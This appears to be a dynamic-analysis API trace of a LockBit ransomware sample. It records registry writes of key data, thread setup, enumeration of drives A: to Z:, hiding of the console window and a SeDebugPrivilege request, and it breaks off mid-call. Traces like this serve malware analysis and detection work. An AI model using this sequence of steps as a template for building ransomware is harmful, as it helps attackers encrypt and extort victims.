free (_Block=0x2061400) [0068.513] free (_Block=0x2061370) [0068.513] free (_Block=0x20612e0) [0068.513] free (_Block=0x2060950) [0068.514] free (_Block=0x20609e0) [0068.514] free (_Block=0x2060a70) [0068.514] free (_Block=0x2060b00) [0069.297] free (_Block=0x2060b90) [0069.298] free (_Block=0x2060c20) [0069.298] free (_Block=0x2060cb0) [0069.299] free (_Block=0x2060d40) [0069.299] free (_Block=0x2060dd0) [0069.299] free (_Block=0x2060e60) [0069.300] free (_Block=0x2060ef0) [0069.300] free (_Block=0x2060f80) [0069.300] free (_Block=0x2061010) [0069.301] free (_Block=0x20610a0) [0069.301] free (_Block=0x2061130) [0069.301] free (_Block=0x20611c0) [0069.302] free (_Block=0x2062fd0) [0069.302] free (_Block=0x53dc08) [0069.302] calloc (_Count=0x20, _Size=0x4) returned 0x53d8d8 [0069.302] memcpy (in: _Dst=0x53d8d8, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53d8d8) returned 0x53d8d8 [0069.303] calloc (_Count=0x20, _Size=0x4) returned 0x53dc08 [0069.303] memcpy (in: _Dst=0x53dc08, _Src=0x53d8d8, _Size=0x80 | out: _Dst=0x53dc08) returned 0x53dc08 [0069.303] calloc (_Count=0x20, _Size=0x4) returned 0x53dc90 [0069.303] calloc (_Count=0x21, _Size=0x4) returned 0x2061250 [0069.303] memcpy (in: _Dst=0x2061250, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061250) returned 0x2061250 [0069.303] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0069.303] calloc (_Count=0x42, _Size=0x4) returned 0x2062da0 [0069.303] calloc (_Count=0x1, _Size=0x4) returned 0x2064b80 [0069.303] calloc (_Count=0x41, _Size=0x4) returned 0x2062fd0 [0069.303] memcpy (in: _Dst=0x2062fd0, _Src=0x2064b80, _Size=0x4 | out: _Dst=0x2062fd0) returned 0x2062fd0 [0069.303] calloc (_Count=0x41, _Size=0x4) returned 0x2062b70 [0069.303] memcpy (in: _Dst=0x2062b70, _Src=0x2062fd0, _Size=0x104 | out: _Dst=0x2062b70) returned 0x2062b70 [0069.303] calloc (_Count=0x20, _Size=0x4) returned 0x53dc90 [0069.303] memcpy (in: _Dst=0x53dc90, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53dc90) returned 0x53dc90 [0069.303] calloc (_Count=0x43, _Size=0x4) returned 0x2060448 [0069.303] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0069.303] calloc (_Count=0x3, _Size=0x4) returned 0x2060060 [0069.303] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0069.303] memcpy (in: _Dst=0x2061130, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061130) returned 0x2061130 [0069.303] calloc (_Count=0x41, _Size=0x4) returned 0x2062c88 [0069.304] memcpy (in: _Dst=0x2062c88, _Src=0x2061130, _Size=0x84 | out: _Dst=0x2062c88) returned 0x2062c88 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2064b80, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.304] calloc (_Count=0x3, _Size=0x4) returned 0x2060078 [0069.304] memcpy (in: _Dst=0x2060078, _Src=0x2064b80, _Size=0x8 | out: _Dst=0x2060078) returned 0x2060078 [0069.304] calloc (_Count=0x22, _Size=0x4) returned 0x2061130 [0069.304] memcpy (in: _Dst=0x2061130, _Src=0x2060078, _Size=0xc | out: _Dst=0x2061130) returned 0x2061130 [0069.304] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0069.304] memcpy (in: _Dst=0x2062eb8, _Src=0x2061130, _Size=0x88 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.304] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.304] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.305] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0069.305] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0069.314] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.325] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.341] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.357] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.375] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.388] memcpy (in: _Dst=0x2061250, _Src=0x2062bf0, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.780] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.793] memcpy (in: _Dst=0x2061250, _Src=0x2062bf0, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.825] memcpy (in: _Dst=0x2061250, _Src=0x2062bf0, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.841] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.856] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0069.876] RegSetValueExA (in: hKey=0x144, lpValueName="full", Reserved=0x0, dwType=0x3, lpData=0x41ca90*, cbData=0x500 | out: lpData=0x41ca90*) returned 0x0 [0069.877] RegSetValueExA (in: hKey=0x144, lpValueName="Public", Reserved=0x0, dwType=0x3, lpData=0x53d3a8*, cbData=0x103 | out: lpData=0x53d3a8*) returned 0x0 [0069.878] RegCloseKey (hKey=0x144) returned 0x0 [0069.878] CryptBinaryToStringA (in: pbBinary=0x41b000, cbBinary=0x8, dwFlags=0x4, pszString=0x18fb98, pcchString=0x18fc00 | out: pszString="d0 40 7a c9 d9 7c 78 cb\r\n", pcchString=0x18fc00) returned 1 [0071.959] CryptBinaryToStringA (in: pbBinary=0x53d3a8, cbBinary=0x8, dwFlags=0x4, pszString=0x18fb98, pcchString=0x18fc00 | out: pszString="f5 b5 4e cc 6b 4d 10 9b\r\n", pcchString=0x18fc00) returned 1 [0071.959] memcpy (in: _Dst=0x20650f5, _Src=0x18f7fc, _Size=0x204 | out: _Dst=0x20650f5) returned 0x20650f5 [0071.960] free (_Block=0x53d3a8) [0071.960] GetSystemInfo (in: lpSystemInfo=0x18fc6c | out: lpSystemInfo=0x18fc6c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0071.961] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0071.961] wvsprintfA (in: param_1=0x18f6e8, param_2=" Starting IO threads...", arglist=0x18fc28 | out: param_1=" Starting IO threads...") returned 23 [0071.961] wsprintfA (in: param_1=0x18f6e8, param_2="%s\r\n" | out: param_1=" Starting IO threads...\r\n") returned 25 [0071.961] GetLocalTime (in: lpSystemTime=0x18fbe8 | out: lpSystemTime=0x18fbe8*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x14, wMilliseconds=0xae)) [0071.961] wsprintfA (in: param_1=0x18fae8, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:20] ") returned 11 [0071.961] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.961] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0071.965] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x18fae8*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x18fc14, lpReserved=0x0 | out: lpBuffer=0x18fae8*, lpNumberOfCharsWritten=0x18fc14*=0xb) returned 1 [0071.968] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0071.968] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x18f6e8*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18fc14, lpReserved=0x0 | out: lpBuffer=0x18f6e8*, lpNumberOfCharsWritten=0x18fc14*=0x19) returned 1 [0071.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xf90) returned 0x1e8 [0071.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xf94) returned 0x1ec [0071.972] SetThreadAffinityMask (hThread=0x1e8, dwThreadAffinityMask=0x1) returned 0x1 [0071.972] SetThreadAffinityMask (hThread=0x1ec, dwThreadAffinityMask=0x1) returned 0x1 [0071.972] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xf98) returned 0x1f0 [0071.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xf9c) returned 0x1f4 [0071.974] SetThreadAffinityMask (hThread=0x1f0, dwThreadAffinityMask=0x2) returned 0x0 [0071.975] SetThreadAffinityMask (hThread=0x1f4, dwThreadAffinityMask=0x2) returned 0x0 [0071.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfa0) returned 0x1f8 [0071.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfa4) returned 0x1fc [0071.977] SetThreadAffinityMask (hThread=0x1f8, dwThreadAffinityMask=0x4) returned 0x0 [0071.977] SetThreadAffinityMask (hThread=0x1fc, dwThreadAffinityMask=0x4) returned 0x0 [0071.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfa8) returned 0x200 [0071.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410e30, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfac) returned 0x204 [0071.980] SetThreadAffinityMask (hThread=0x200, dwThreadAffinityMask=0x8) returned 0x0 [0071.980] SetThreadAffinityMask (hThread=0x204, dwThreadAffinityMask=0x8) returned 0x0 [0071.980] SystemTimeToFileTime (in: lpSystemTime=0x18fc5c, lpFileTime=0x41d2cc | out: lpFileTime=0x41d2cc) returned 1 [0071.984] RtlAdjustPrivilege (in: Privilege=0x9, NewValue=1, ForThread=0, OldValue=0x18fcbf | out: OldValue=0x18fcbf) returned 0x0 [0071.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4088c0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fcc4 | out: lpThreadId=0x18fcc4*=0xfb0) returned 0x208 [0071.985] GetTickCount () returned 0x1dbcdc3 [0071.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4138a0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfb4) returned 0x20c [0071.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408a60, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfb8) returned 0x210 [0071.988] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="A:\\") returned 3 [0071.988] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0071.988] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="B:\\") returned 3 [0071.988] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0071.988] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="C:\\") returned 3 [0071.989] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.989] malloc (_Size=0xa) returned 0x2060060 [0071.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4090e0, lpParameter=0x2060060, dwCreationFlags=0x0, lpThreadId=0x18fc3c | out: lpThreadId=0x18fc3c*=0xfbc) returned 0x214 [0071.990] wvsprintfA (in: param_1=0x18f6ec, param_2=" . Found FIXED drive %S", arglist=0x18fc2c | out: param_1=" . Found FIXED drive C:\\") returned 25 [0071.990] wsprintfA (in: param_1=0x18f6ec, param_2="%s\r\n" | out: param_1=" . Found FIXED drive C:\\\r\n") returned 27 [0071.990] GetLocalTime (in: lpSystemTime=0x18fbec | out: lpSystemTime=0x18fbec*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x14, wMilliseconds=0xce)) [0071.990] wsprintfA (in: param_1=0x18faec, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:20] ") returned 11 [0071.990] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.990] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0071.991] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x18faec*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x18fc18, lpReserved=0x0 | out: lpBuffer=0x18faec*, lpNumberOfCharsWritten=0x18fc18*=0xb) returned 1 [0071.991] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0071.991] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x18f6ec*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x18fc18, lpReserved=0x0 | out: lpBuffer=0x18f6ec*, lpNumberOfCharsWritten=0x18fc18*=0x1b) returned 1 [0071.992] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="D:\\") returned 3 [0071.992] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0071.992] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="E:\\") returned 3 [0071.992] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0071.992] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="F:\\") returned 3 [0071.992] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0071.992] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="G:\\") returned 3 [0071.992] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0071.993] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="H:\\") returned 3 [0071.993] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0071.994] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="I:\\") returned 3 [0071.994] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0071.994] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="J:\\") returned 3 [0071.994] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0071.994] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="K:\\") returned 3 [0071.994] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0071.995] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="L:\\") returned 3 [0071.995] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0071.995] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="M:\\") returned 3 [0071.995] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0071.995] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="N:\\") returned 3 [0071.995] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0071.995] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="O:\\") returned 3 [0071.995] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0071.996] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="P:\\") returned 3 [0071.996] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0071.996] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="Q:\\") returned 3 [0071.996] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0071.996] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="R:\\") returned 3 [0071.996] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0071.996] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="S:\\") returned 3 [0071.997] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0071.997] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="T:\\") returned 3 [0071.997] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0071.997] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="U:\\") returned 3 [0071.997] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0071.997] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="V:\\") returned 3 [0071.997] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0071.997] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="W:\\") returned 3 [0071.997] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0071.998] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="X:\\") returned 3 [0071.998] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0071.998] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="Y:\\") returned 3 [0071.998] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0071.998] wsprintfW (in: param_1=0x18fc4c, param_2="%C:\\" | out: param_1="Z:\\") returned 3 [0071.998] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0071.998] Sleep (dwMilliseconds=0x1388) [0080.434] Sleep (dwMilliseconds=0x64) [0080.543] Sleep (dwMilliseconds=0x64) [0080.716] Sleep (dwMilliseconds=0x64) [0080.823] Sleep (dwMilliseconds=0x64) [0080.932] Sleep (dwMilliseconds=0x64) [0081.071] Sleep (dwMilliseconds=0x64) [0081.166] Sleep (dwMilliseconds=0x64) [0081.356] Sleep (dwMilliseconds=0x64) [0081.462] Sleep (dwMilliseconds=0x64) [0081.837] Sleep (dwMilliseconds=0x64) [0082.018] Sleep (dwMilliseconds=0x64) [0082.151] Sleep (dwMilliseconds=0x64) [0082.617] Sleep (dwMilliseconds=0x64) [0082.726] Sleep (dwMilliseconds=0x64) [0082.835] Sleep (dwMilliseconds=0x64) [0083.327] Sleep (dwMilliseconds=0x64) [0084.924] Sleep (dwMilliseconds=0x64) [0085.845] Sleep (dwMilliseconds=0x64) [0086.531] Sleep (dwMilliseconds=0x64) [0086.631] Sleep (dwMilliseconds=0x64) [0086.751] Sleep (dwMilliseconds=0x64) [0087.413] Sleep (dwMilliseconds=0x64) [0087.515] Sleep (dwMilliseconds=0x64) [0087.625] Sleep (dwMilliseconds=0x64) [0087.751] Sleep (dwMilliseconds=0x64) [0087.858] Sleep (dwMilliseconds=0x64) [0087.968] Sleep (dwMilliseconds=0x64) [0088.077] Sleep (dwMilliseconds=0x64) [0088.225] Sleep (dwMilliseconds=0x64) [0088.469] Sleep (dwMilliseconds=0x64) [0089.178] Sleep (dwMilliseconds=0x64) [0089.279] Sleep (dwMilliseconds=0x64) [0089.388] Sleep (dwMilliseconds=0x64) [0089.499] Sleep (dwMilliseconds=0x64) [0089.607] Sleep (dwMilliseconds=0x64) [0090.588] Sleep (dwMilliseconds=0x64) [0090.702] Sleep (dwMilliseconds=0x64) [0090.917] Sleep (dwMilliseconds=0x64) [0091.026] Sleep (dwMilliseconds=0x64) [0091.135] Sleep (dwMilliseconds=0x64) [0091.244] Sleep (dwMilliseconds=0x64) [0091.353] Sleep (dwMilliseconds=0x64) [0091.468] Sleep (dwMilliseconds=0x64) [0091.573] Sleep (dwMilliseconds=0x64) [0091.680] Sleep (dwMilliseconds=0x64) [0091.790] Sleep (dwMilliseconds=0x64) [0091.899] Sleep (dwMilliseconds=0x64) [0092.027] Sleep (dwMilliseconds=0x64) [0092.718] Sleep (dwMilliseconds=0x64) [0092.823] Sleep (dwMilliseconds=0x64) [0093.427] Sleep (dwMilliseconds=0x64) [0093.614] Sleep (dwMilliseconds=0x64) [0094.119] Sleep (dwMilliseconds=0x64) [0094.417] Sleep (dwMilliseconds=0x64) [0094.865] Sleep (dwMilliseconds=0x64) [0094.973] Sleep (dwMilliseconds=0x64) [0095.088] Sleep (dwMilliseconds=0x64) [0095.190] Sleep (dwMilliseconds=0x64) [0095.304] Sleep (dwMilliseconds=0x64) [0095.432] Sleep (dwMilliseconds=0x64) [0095.543] Sleep (dwMilliseconds=0x64) [0095.705] Sleep (dwMilliseconds=0x64) [0095.815] Sleep (dwMilliseconds=0x64) [0095.923] Sleep (dwMilliseconds=0x64) [0096.033] Sleep (dwMilliseconds=0x64) [0096.157] Sleep (dwMilliseconds=0x64) [0096.267] Sleep (dwMilliseconds=0x64) [0096.376] Sleep (dwMilliseconds=0x64) [0096.798] Sleep (dwMilliseconds=0x64) [0096.906] Sleep (dwMilliseconds=0x64) [0097.060] Sleep (dwMilliseconds=0x64) [0097.171] Sleep (dwMilliseconds=0x64) [0097.282] Sleep (dwMilliseconds=0x64) [0097.399] Sleep (dwMilliseconds=0x64) [0097.500] Sleep (dwMilliseconds=0x64) [0097.608] Sleep (dwMilliseconds=0x64) [0097.718] Sleep (dwMilliseconds=0x64) [0097.838] Sleep (dwMilliseconds=0x64) [0097.936] Sleep (dwMilliseconds=0x64) [0098.047] Sleep (dwMilliseconds=0x64) [0098.154] Sleep (dwMilliseconds=0x64) Thread: id = 2 os_tid = 0xf6c [0062.102] AllocConsole () returned 1 [0063.880] GetConsoleWindow () returned 0x50060 [0063.880] ShowWindow (hWnd=0x50060, nCmdShow=0) returned 1 [0063.883] SetConsoleTitleA (lpConsoleTitle="LockBit Ransom") returned 1 [0063.883] SetConsoleCtrlHandler (HandlerRoutine=0x410060, Add=1) returned 1 [0063.883] SetProcessShutdownParameters (dwLevel=0x0, dwFlags=0x0) returned 1 [0063.883] GetWindowLongA (hWnd=0x50060, nIndex=-20) returned 262928 [0063.884] SetWindowLongA (hWnd=0x50060, nIndex=-20, dwNewLong=787216) returned 262928 [0063.885] SetLayeredWindowAttributes (hwnd=0x50060, crKey=0x0, bAlpha=0xd8, dwFlags=0x2) returned 1 [0063.896] GetSystemMenu (hWnd=0x50060, bRevert=0) returned 0x601fb [0063.906] EnableMenuItem (hMenu=0x601fb, uIDEnableItem=0xf060, uEnable=0x3) returned 0 [0063.907] DeleteMenu (hMenu=0x601fb, uPosition=0xf060, uFlags=0x0) returned 1 [0063.907] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0063.907] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1d5ff58 | out: lpMode=0x1d5ff58) returned 1 [0063.909] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1 [0063.910] RegisterHotKey (hWnd=0x0, id=1, fsModifiers=0x4, vk=0x70) returned 1 [0063.910] RegisterHotKey (hWnd=0x0, id=2, fsModifiers=0x0, vk=0x70) returned 1 [0063.910] GetMessageW (lpMsg=0x1d5ff6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 3 os_tid = 0xf70 [0062.112] TppWaiterpThread () Thread: id = 4 os_tid = 0xf7c [0062.801] FindFirstVolumeW (in: lpszVolumeName=0x1f5fd80, cchBufferLength=0x104 | out: lpszVolumeName="\\\\?\\Volume{e051b542-7147-11eb-bfc5-806e6f6e6963}\\") returned 0x2c0df8 [0062.802] QueryDosDeviceW (in: lpDeviceName="Volume{e051b542-7147-11eb-bfc5-806e6f6e6963}", lpTargetPath=0x1f5fb78, ucchMax=0x104 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x19 [0062.802] malloc (_Size=0x412) returned 0x2062b58 [0062.802] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{e051b542-7147-11eb-bfc5-806e6f6e6963}\\", lpszVolumePathNames=0x2062b58, cchBufferLength=0x209, lpcchReturnLength=0x1f5fb60 | out: lpszVolumePathNames=0x2062b58, lpcchReturnLength=0x1f5fb60) returned 1 [0062.803] GetDriveTypeW (lpRootPathName="\\\\?\\Volume{e051b542-7147-11eb-bfc5-806e6f6e6963}\\") returned 0x3 [0062.804] free (_Block=0x2062b58) [0062.804] FindNextVolumeW (in: hFindVolume=0x2c0df8, lpszVolumeName=0x1f5fd80, cchBufferLength=0x104 | out: hFindVolume=0x2c0df8, lpszVolumeName="\\\\?\\Volume{e051b542-7147-11eb-bfc5-806e6f6e6963}\\") returned 0 [0062.804] FindVolumeClose (hFindVolume=0x2c0df8) returned 1 [0062.804] RtlExitUserThread (Status=0x0) Thread: id = 5 os_tid = 0xf80 [0062.805] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x205f384 | out: TokenHandle=0x205f384*=0x148) returned 1 [0062.805] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x205f37c | out: lpLuid=0x205f37c*(LowPart=0x14, HighPart=0)) returned 1 [0062.812] AdjustTokenPrivileges (in: TokenHandle=0x148, DisableAllPrivileges=0, NewState=0x205f36c*(PrivilegesCount=0x1, 